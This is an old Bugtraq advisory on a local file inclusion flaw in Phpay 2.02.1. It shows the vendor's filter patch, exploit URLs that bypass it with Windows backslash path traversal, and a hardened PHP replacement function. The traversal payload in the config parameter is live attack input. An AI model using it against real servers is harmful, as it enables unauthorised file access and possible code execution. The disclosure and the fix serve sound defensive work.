Phpay - Local File Inclusion

Board: Bugtraq, Posted: 2007/12/16 01:09
By Michael Brooks

Vulnerability Type: Local File Inclusion
Software: Phpay
Homepage: http://sourceforge.net/projects/phpay/
Version Affected: 2.02.1

Phpay has been affected by multiple local file include flaws; as a result, this patch was written:

    $config = ereg_replace(":","", $config);
    $config = trim(ereg_replace("../","", $config));
    $config = trim(ereg_replace("/","", $config));
    if (($config=="")|| (!eregi(".inc.php",$config))){
        $config="config.inc.php";
        echo "<!--$config-->\n";
    }
    if (!file_exists("$config")) {
        echo "panic: $config doesn't exist!! Did you backup it after installation? ...";
        exit;
    }
    require("./$config");

To bypass this patch, backslashes can be used instead of forward slashes on Windows systems. Also, .inc.php must exist *somewhere* in the string.

Local File Include for Windows only:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
or if magic_quotes_gpc is turned on:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess

Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration: there is a call to extract($_GET), so the exploit will work regardless of register_globals.

Using Linux is a very good fix for this issue.

Merry Christmas
Article ID (AID): #17P0fP00 (Bugtraq)
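
A hardened form of the config check discussed in the advisory, as an added example that is not Phpay's code or the author's. It replaces the strip-and-search filtering with a whole-string allowlist (anchored `.inc.php` suffix, no separators of either kind) plus a canonical-path check; `resolve_config()`, the sandbox directory and the file names are assumptions made for illustration.

```php
<?php
// Added example, not Phpay's code. resolve_config() and the file names are hypothetical.
declare(strict_types=1);

function resolve_config(string $requested, string $configDir,
                        string $default = 'config.inc.php'): string
{
    // Whole-string allowlist: one file name, no "/", "\", ":" or extra dots,
    // and the ".inc.php" suffix is anchored at the end with literal dots.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.inc\.php\z/', $requested)) {
        $requested = $default;               // same fallback as the original patch
    }
    $base = realpath($configDir);
    if ($base === false) {
        throw new RuntimeException('config directory missing');
    }
    // realpath() canonicalises the path; the parent must still be $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || dirname($path) !== $base || !is_file($path)) {
        throw new RuntimeException('config file not found');
    }
    return $path;
}

// Constructed sandbox: two config files and a protected admin directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phpay_demo_' . getmypid();
mkdir($dir . DIRECTORY_SEPARATOR . 'admin', 0700, true);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'config.inc.php', "<?php\n");
file_put_contents($dir . DIRECTORY_SEPARATOR . 'shop2.inc.php', "<?php\n");
file_put_contents($dir . DIRECTORY_SEPARATOR . 'admin' . DIRECTORY_SEPARATOR . '.htaccess',
                  "deny from all\n");

// Constructed inputs; the third is the string quoted in the advisory.
$samples = [
    'shop2.inc.php',
    '',
    'eregi.inc.php\\..\\admin\\.htaccess',
    'shop2.inc.php.bak',
    'C:shop2.inc.php',
];
foreach ($samples as $s) {
    // Anything that is not a plain "<name>.inc.php" resolves to the default file.
    printf("%-40s -> %s\n", var_export($s, true), basename(resolve_config($s, $dir)));
}
```

The `ereg` family used in the original patch was removed in PHP 7.0, so `preg_match` with explicit `\A`...`\z` anchors is used here; the value should be read from `$_GET['config']` explicitly rather than through `extract($_GET)`.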